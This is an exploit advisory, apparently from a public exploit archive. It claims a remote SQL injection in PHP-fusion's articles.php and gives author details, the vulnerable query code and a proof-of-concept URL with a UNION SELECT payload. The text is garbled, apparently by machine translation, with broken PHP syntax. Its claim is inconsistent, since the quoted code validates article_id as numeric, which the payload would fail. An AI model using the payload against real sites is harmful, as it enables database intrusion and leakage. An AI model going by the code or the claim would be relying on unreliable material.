PHP-fusion is a content management system. The article. PHP in php-fusion has the SQL injection vulnerability, which may cause leakage of sensitive information.
[+] Info:
~~~~~~~~~
# Title: PHP-fusion (articles. php) SQL Injection Exploit
# Author: KedAns-Dz
# E-mail: ked-h@hotmail.com
# Home: HMD/AM (0, 30008/04300)-Algeria-(00213555248701)
# Twitter page: twitter.com/kedans
# Platform: php
# Impact: Remote SQL Injection
# Tested on: Windows XP sp3 FR
[+] Poc:
~~~~~~~~~
# Vulnerability in the file articles. php:
If (isset ($ _ GET [article_id]) & isnum ($ _ GET [article_id]) {
$ Result = dbquery (
"SELECT ta. article_subject, ta. article_article, ta. article_breaks,
Ta. article_datestamp, ta. article_reads, ta. article_allow_comments, ta. article_allow_ratings,
Tac. article_cat_id, tac. article_cat_name,
Tu. user_id, tu. user_name, tu. user_status
FROM ". DB_ARTICLES." ta
Inner join ". DB_ARTICLE_CATS." tac ON ta. article_cat = tac. article_cat_id
Left join ". DB_USERS." tu ON ta. article_name = tu. user_id
WHERE ". groupaccess (article_cat_access)." AND article_id = ". $ _ GET [article_id]." AND article_draft = 0"
);
# Exploit: http: // [localhost]/[Path]/articles. php? Article_id =-1 + union + select + version ()--